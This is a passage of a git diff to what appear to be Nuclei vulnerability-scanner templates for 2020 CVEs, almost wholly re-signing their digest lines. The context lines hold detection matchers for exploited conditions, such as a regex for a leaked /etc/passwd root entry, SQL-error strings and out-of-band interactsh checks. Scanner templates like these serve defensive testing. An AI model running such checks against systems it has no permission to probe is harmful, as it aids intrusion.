4a0a00473045022100e6f9ec163603fb91039d4dcc86030ab294c424b91101acd76a980c574890944f0220725e5377e2d36f340c7418411ae3317d0d6cd0af2ba58057b805622d0092b0df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index f106a15ffe..05208fa890 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cce965ef0e5f7b96e9cf6247ba8c4ec167de10b97ed77df6888357d32ea276ed02204e342f92f259535209b179ca83105857c986a25246d864891cf6478e51e73f3c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220441a893234aa21aa4cb3a4240dff2e00202780e23989705102ba442dd9a45d9a022100f493c8f0155872ff42a27288ba0479e0fea15e8e0ec251514b946fb1ec2f7c88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 2660045be1..0a3fc187b2 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200c19441e6f335302d17211f2350d748e3b700efc663b93a95fb275995bbebfc2022100cf74449acaace153b5fd8bbb65c91958a2c36993b1d068799f7c28fefea9d560:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cd0d900b5f35d31817ba17cf8b9db0b9a671776a94129074d18212956ad58703022100c4a2b89dd749cafe75809b54f610d4d626061424e7663ce4bce85ecd8349aad5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index 5dd05423b8..00a76d8c85 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e0484cb363e1ae22355ec071374676b2bed8851ba2ad5717a41cba5ce1d092e7022026eb09974e05856984a6a2cbbe1a326e6937e132633bcb6ff39d4181e000369e:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022032deec163f8523a61d2d8491f248050cea27f812c1378491fe7d3c72a9ba20100220770dee1010254586b389a4d49c80f74d913507b616c2c757da5ec2ca5c59d7de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index d3d46c926c..a5b33cd44b 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220752e9b960804c6e96d0f86e5e5eeae71d1d25972b2151d23e0d2e382e708679e022074b792ff1bfe0a6a22544c2372ab01d4073b28642b4d2b7634bba45a75d89060:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204f8ec9d0c1589a80c38a8886b02cdfa39758ba645ba8186d67401c0edb9cd697022100808198487a153163be2b77ad756102d4403ccbc3af1e5b1027384067bc3f3ad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index d27a4462da..ec9b7d1e66 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201bcab37ca3fca03be9c0c337991bbba6fec8c16c7b70f67b413f595100d916bb02207dd74751bfec8bf32e1ea0af967c14bacab3e6d2ae7d83adc62d123f8e5c2adc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e0ab9995c821694f2e0005b53483053f84bc8a5c3eacb984f584c31fbdd85d8d022100a0070ce1abc01f0acac559981358f7880ebb57bd4cc8be0d9f9b6b8fa033befb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index 9bc5e18a1f..c001efe8fb 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -58,5 +58,4 @@ http: part: body_2 words: - '{{randstr_2}}' - -# digest: 4b0a00483046022100acc4c160a1e4c6c9c9cec188eedefe3d56fdd3fc66d0b709490a3d67aa1b0858022100c151a083f07d9de44c3359239e38d7f40112eac7e166110c2143a02522119c62:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ffaf513d0e1febb7a3d282228dc9d327b70daa27eb89fc72663dcb1a473aa9d5022100858939f68a35e6c374c6769c4cec2aa441718f3cad71cff53e42b163ffce7673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index 1a7e24034b..e76393dfa8 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -42,5 +42,4 @@ http: - "INTERNAL_PASSWORD_ENABLED" - "CONF_VIRTUAL_KEYBOARD" condition: and - -# digest: 4a0a0047304502203c8f0048653b48628a9048e0b56eec876dee7a0d62c6501887c93a8d4f244771022100a50cde8178ce1f561a54d1344ac419f51f148bf7a5efade02fbecd4921c1c5d1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a3fd4758aa75d2eb40e02149f04b2d1648abaa50ca1df2f6ed6c32b158adf32502204e31f0020b1f52a24660b056cfef83a9121909eb9f76ab70ab6aa487a93154cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 42c7a516ca..f48ca05d2b 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -38,5 +38,4 @@ http: - "log" - "Index of" condition: and - -# digest: 490a0046304402200451a31552259efe410744d3587a4ba3127b6d435137867aeeebecf0b3fd00c4022044ba70725c288cc7ba674049bfc3a1dbd7c906fbf0283a86fc48704e3305ad44:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202d43ca02fadee9942c3736120240e45b96b5c28e3e73f9be32583fe2ce0633840221009ca4bffac37a02318d20b0e6dd137047c9b12b3d0efa38ff135be3699282daef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index c8d036c3d0..f636e486c6 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a10291b26e4f4664286d3871f903ef9b7baaba7fc0220cb087dd3b743c94c7b902203923878cd9987fc768552699f7a232c3b94b71bb456b36096e88ef17e1ca0770:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008a296fd026ba3c9d1bf71a0da7b8d7badde0d94b120c2376ace51d02d5b6b715022061a504ff97e842b87dc370574e96c0b416a3dc817b78e028fadc6060629668de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 19f62c341c..de91b4ce0c 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205538088e5a1a5d299495b1a38b9679645ce34e43dd1eae5152476fb1188c2390022100d94454f3e53619fe4bf7080acd796c268e4903dfa0ce3ef34373ddb746152fd9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a2a0226d9d73a49f1cae1365e0ec614cf9b15951fa64d10f9abf0d6a958f4b94022072238ab31a787a6753526cd15c758140e08478e66a469fbbb7280c1e4cb79a0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 77b8cd2feb..6f2d18c25f 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -62,5 +62,4 @@ http: group: 1 regex: - "(?m)Stable tag: ([0-9.]+)" - -# digest: 4a0a00473045022061e851d284c2c4779551a745fb95382354a1e5fb16b56e0bbf8d056f8a3845d202210090812e5b1c835039dd5f39b20f004a062383260de137d3d12bf470e1994ab259:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022045ae1ffa369e49cf9cdd1b9b1e724c410620a940eed25cc247775a55b293ae0102200ce6030db441424c072a8fa88d3b30c2e8063ee1645ddefd1056f77973123990:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index cdb5c5dd55..b8b7476a88 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -35,5 +35,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4a0a00473045022007954488e08a35aecff087b527722f943f0240646997255ab6ce1c9bc090ac51022100f461e6c76220b132591d90b5e91f96d803b663aa8fb5a5a82457b26f355e0e4f:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220457e779a3a68903b8cb14487023647a81a60e909677b5ec8a5d636529aaa1b42022064eaf2901a17648c5329d17a75d77824e8148828f4242e16f24009e204ea2766:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 09c56cc8dc..246c31ec12 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022035a2fe9870ec1924eb783d1b4a52f647e2a2ea9dab586f185b07f539445310b7022100efa540ade813e3c7a58abfb88a43e5316de6b44b81d0256facae1f3c5c591cb0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c62dce42769ca9ee9802838163a3f0b3e6da84ec5ef84369a10c79dec881583b02204e4c75a8b644f225593cce75806f0cdd5738b1eeeb679af5c419e6d185db922b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index 8473cbeffa..8afc81cd8e 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -42,5 +42,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4a0a0047304502210096beac347ca265f8a4ff1cfbd94b7ec5469e2932adc7d3ea761bd54f94ffe7bb022011bc7fd1f008f2fc0f4d90aec331913e62a67d1361820150edc0e1b1a1b8d675:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022034430b794f9deabb0f4bacaaf49eb5776de6047aec88c91b3d119c7a89c023d6022100fe3db693a590d4c3c97c5f3493098797eff1095eb0dba8c69433a8d8c387be24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index 5201478f47..30faa1c447 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -38,5 +38,4 @@ http: - type: word words: - "poc-testing" # from Base64 decoding payload - -# digest: 4b0a00483046022100a87fd8a9c8be4f19443caa5e514e87103e5ad9bd44fb894595996eff13178128022100d63bd4401108c3d11925ac28150aca18f803366adac64f7cc7cfe4b4502c9c40:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a81c35e3e33f561a341cd33ef7eef44dc80eac8abd561c746cd0cc0e91d4afa90220746cfe352cf25a06ff1e0adba502daa2daf24c87b0e0a37c50858f6acd203577:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index 4cbfbe5de4..77eb0a657a 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201503b79c441ddc0c12e6bd0b89f40b179ec5120b132d7e42a18d7bf5209ecc3c0220133f77247a829e268740b89a3dad640e4c374690f4cc8f490de21e4d42265c51:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009fc6817c6353772962ffa226caea0d71e946d9e4e12ace245e6e1290524bcefd0220470e46a66776d226c8d48a4c1044ed7bf7d659342ddeac28bb01ad42ac04fcc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index 9f48f5fe89..cb80c8590f 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210084e0827bb105fa5f888dd1f9a411744080f592abc22f8a9d8d8f752ca8af3bea0221009d17fe7b48ee7abfe5cd41829e2bbbc40809ba5df58080a382c74f3fa04bbce2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d0ee395e6f5bc1a6ec812fa63d1f23c74fccb16972a808ea8d88ac2dcbbfa3e8022100a2691fc3df5dbe3466c16b06bc7f75d0f5fd3373ff01b9ba3ac87821202effbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index 0ebf8e9010..2f0d8ba546 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e8394479cf357bcb45998e7680bd36633fd99b1f14fb9e8ac208601e571f318f022100c787103850f43d8aa0cdb3bb309856fb19f0cc3686d21218513d18eb4543346e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b167d1ecaa3a7ab16655c3259b3c0476cad99f74fbe1135f446a7d01b3eb00890220281d777a8441ef51a99981270d1f19dd222219b6aca0a8f7d2265fa21243b725:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index b40bc0fc52..79027ed28e 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022008e2b7d03df01dd06a7fd9d9dc1c62efe9b74d7200f615b61f32a175036ce5ac0220121a32ede9bd5740d928eaf07f6ce042b53d8476a494b746ccbfd6252754e224:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204227319ead900709caad6faed8d12152967b55a572741afab39e5518017efe7602210084ba8e66f6b6778bc0e9250cc5bb5a6b2728b7f29c6be8a3306735b54f0b05fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index 8226da9ac4..46c38a59e6 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d501bf349fc8a2146537bb4258c04dd9e3a8a2445cca839617a62ad57e13c95c022013aa801332251db9c17d261431d88bbfc21b088ce6cc0efbf01a43bc3a4ba815:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ab13559a504c3a7ff116904d45e98edd973544d5bcee497153137d306ce55fc10220280897ecd037287beeb9b50310bd02346cbb239bd6f0c750522dc6b5b29dcd65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index 134d844e0b..cd894b1072 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -71,5 +71,4 @@ http: negative: true regex: - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"' - -# digest: 4a0a00473045022100ab338b4d44987561dd2a5d8e752e989e1be0550ed02be0094d862f3e775460240220562e4bb922596ecec93296f716595ecc81483153ca9476a6515c40051f627cc5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022005f90d1699e1c6e7cd13a1c1cd52c66e9f4b9775da1a684938254f7ab0353d5b022100f8e66e2ae81d81130a5e401100778364fe7940cbc6d949fc3733d4b2c3c7ffa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index f920b42c53..96014e91e1 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -46,5 +46,4 @@ http: part: body regex: - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"' - -# digest: 4a0a00473045022100df2acec3b3f9028efaaae9a561807f4ee6cdeb9025b1fc7144122b35509a90a9022037efedfc26c2aa65335be68946fce8428c2d2eee5702dc4b41c9907c65310863:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a81ed6696f9447930c89f9d96b85cd17e8a835515bc5659bb747f0806680cc0802210096bdb46ea7f5d86b5b3708b308cef95dd554f4bf49432ece9e81ebb9bf172b73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index a798ee34ee..127189f706 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml @@ -74,5 +74,4 @@ http: - not found in ([/a-z_]+)wp internal: true part: body - -# digest: 4a0a00473045022100d247cf94da2bb916acbbaec102e67914dfa0ef1e73d84fdd4fd0342dec43636902207071d74103dd24393a0a28f05e4a336cfba6b5796b7b7ff8783cc001df4b6177:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cf36dc6c91514ba48b7c1232cb3d8b1712e8885e6b220fcca7af9940330c085b022100c81a55d7685498ce2be6beff3072edf7554e9f51927c476532bb33c9f6293ba8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 33249a5fe4..d6a0e7d10b 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -63,5 +63,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4a0a004730450221008a9cc69a72447171e96a34c55f9d82ac502813e3f1b95dedf4eaf73a59d5553802207fbd07e9610e40387c7788df2beb1c8a7e4883a98ec4655264c6084ef8916803:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022042d76b15ce16bf0343c2df18121ca5f2e25c9918d3984c6df96fb9d1e4081860022100bc843dabf607f0bc571ebd47e6756e5f4fce7a227036f1f158895bdfdc52a934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 0b04fbc52d..b1974bd783 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -63,5 +63,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4a0a0047304502206458aee1badf1f091dabfaf0129bff506e398166644a92b1e6efba37296017390221008632fc3a9b8fe69a81ad42fb473658dae6df01faba5a762e86fadc08867ec6d0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f777bf410fe8ddcd59f4cd192a0fd94c584aef583e46f77c4de8142d6e9e8fd702206c43c12edf7085b962915b2043e3a1c7b97f5c35f014005ebd49babd3ce15b44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 7b4f31497b..2965bd0f16 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -63,5 +63,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 490a004630440220699bc939a68394eb7a0e9af2c1cd2c3bbfdec122450882829964f408f4f3736a022067a1efc8adc8d44a5167f68302c996d9bdc5f06b188dee01caa50005f48c39bf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201fafd293ff92a18e24b03483d9408d862c6ff8c99489c631d6523fa6998e8f6e022100fe8be2982e3093c661983e967b1287d0407e0603887043086cdc475a6195a461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 7bcb8576cf..ea27b22b0b 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -63,5 +63,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 490a00463044022043f68c43177d16ae616bb24d9ffec290bee40fd3c901baf985ecbeeeb81c2bf40220038d025036e6848e6e63db3ba7e4cc0ccf0ac3eb5aabfe006128600c564295f4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cb5cf3bdfeceabc81cef4dd73cdca32ef93e0dfbca045b20895d1498dfd15798022100ad76440d170257cdb1f95ddcbd3b0114b9aec4eff8d760ef7156023928d038fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index 84994f8064..f705e8352a 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -38,5 +38,4 @@ http: - "get book price failed! You have an error in your SQL syntax" - "Can't retrieve data You have an error in your SQL syntax" condition: or - -# digest: 490a00463044022013a3203082f443ce6c3a2c2002b054f0b644b41a636a59ddde7d39149ca4ac340220118a59fd9c28c45d3811d6d226e634dd8e1f27aa30b939b07f76c54ef6900fa2:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203c4a25887e7193e867c811ac2650bbaa7570e6b93c14e3bf44137d76499144f80220439243f1f6999b9463ac26d1e3274d55e90a65c3424d8230bba6926330232312:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index cae09ed905..a7fdf8cc7b 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022037971992c1012364e808a3717fe27c6acfcde625b752c95cbddf1192a2e0770802205427dee24fd650bdfc93375f2f1acdb87b2a2fb9c33e665aa706d6480921a939:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c51980bd564d9ec60b1e6b8e6a47b3548bc75bbd2d753a7104556907ea6221ac022100a2097fe278044cb04df0f9d31cc8a8d4a9ba669f9ca290b49f693a549bc6e288:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index 8ddb74da2d..eea2eee573 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -36,5 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a004830460221008f75cce2292ef238752c78ae50505c2078727b7b064684455fc21dc2e858c607022100916a73dedb293c971ce882334c419847e492e2f29b916c401370b6d920a63907:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b55fa44b344efbf0e18d9a731d463259b11f2921cefa5c1a30b8d3547a16e2c40220386e2167f5c38b2d6e99f984487d2e16db6126e12e3dfae9617d73b00a6d6225:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index fff66ae98f..befa3c6090 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022077dde248bd20b83fbcb64d898a4604706bccbec99ce32cfe8467d99fb66d7fb802205203aca3230b0fa93876b483ace05125ed807436856505b38934e14449ff34ee:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d68fcea995a3567af37c9469ab0101e5072d7135b4e65b1dcc1bd7650a15ed7f022100a5a7e7582f47cd4280c2718af7750379734f0e14df36b2b79f84cc67c4ca7fa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index 643cc4ed19..32b6dd8335 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -59,5 +59,4 @@ http: part: header words: - "application/xml" - -# digest: 4a0a00473045022100bb5e1c14f5fa4eeb94fa8d951f9e59625f451c5ee58d5958c47ab3367355c3db022007e5863acc4122b3f61cc5ae887e90543360ed9f7d3edc30380657a986208a13:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b74a233a1402d526c3afbd669496593746d8fb50568d9faad26461ae9c2f7631022100ae234658bd9a80d26befd08aaed520084f689cfae9fd53bc4a223d3814c15800:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index b5148408f6..84e8b8b3de 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -61,5 +61,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a855d4552e705dc03e517a41538192dde5c83344504d46ce6e824663f4767fab0220507eebdf54ee70a0fe7b802d7aeb2a761aba2c31a9b8b381a03a656cee217568:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202f4af6a5156af115c0386159d38011f09e1fa5cbf514b96e7957ef57c7ba96a6022001613d0e2940aa8cad268895c64fa1d4961e112db0ffdedefdafd15ca4a99afe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index a0ff60c89c..5e55ec7bd4 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207543d521a59b3f988d1cf0aed2abbb5944aaa046f10ca2ff56fac699fc1e831c022100a8983bdb964b97cd0a7b3e44d102a1e40fb7cf9a8cc74653692e1fae563de01d:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220466c93830361cf74dad2d7e8432e69e5fb4af5a9fea36d9cb54e3528c29bfcab0220127bbb384646e6ab063542b9f9275d723e28fdd083fc9c73cb145c759af37fe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 8db50d0658..e3261fe65a 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022038d26de819a71166b82d12504481f988931c3ee001752953a9f03be6a0d1ca1b022027fed2035f0daec07a2bece3cdb1a0f5f4fad2ece8c8f4274da227e49307162f:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044021f4aa0fea2ec5c2a71332ce4a42f60cd86c38a5759dc484da5745b1e9e0e9926022100d8f4b62a23b36fb51aeb9887a53cc2a15123815b747e00e82a0cc145631cecdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index 9a19e0e764..e1b8b71c11 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 302 - -# digest: 4a0a00473045022073c152eccd831761c288cb8dc7182b94b5a11963a73947e8f12ca29c5e4fb7a70221008862577ffb9740c385de27925119e4d1063c7b499134907d4ccf4e2caf425c30:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c76e9abb53ea483cae99a4d96fea6fbf223a58e06810b254ec1771718800c1a30220382894f6884c5419a7807b2423abb0a002497409b37210d76080c5b07c6ffa7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index 4af2f98032..24072fc61e 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 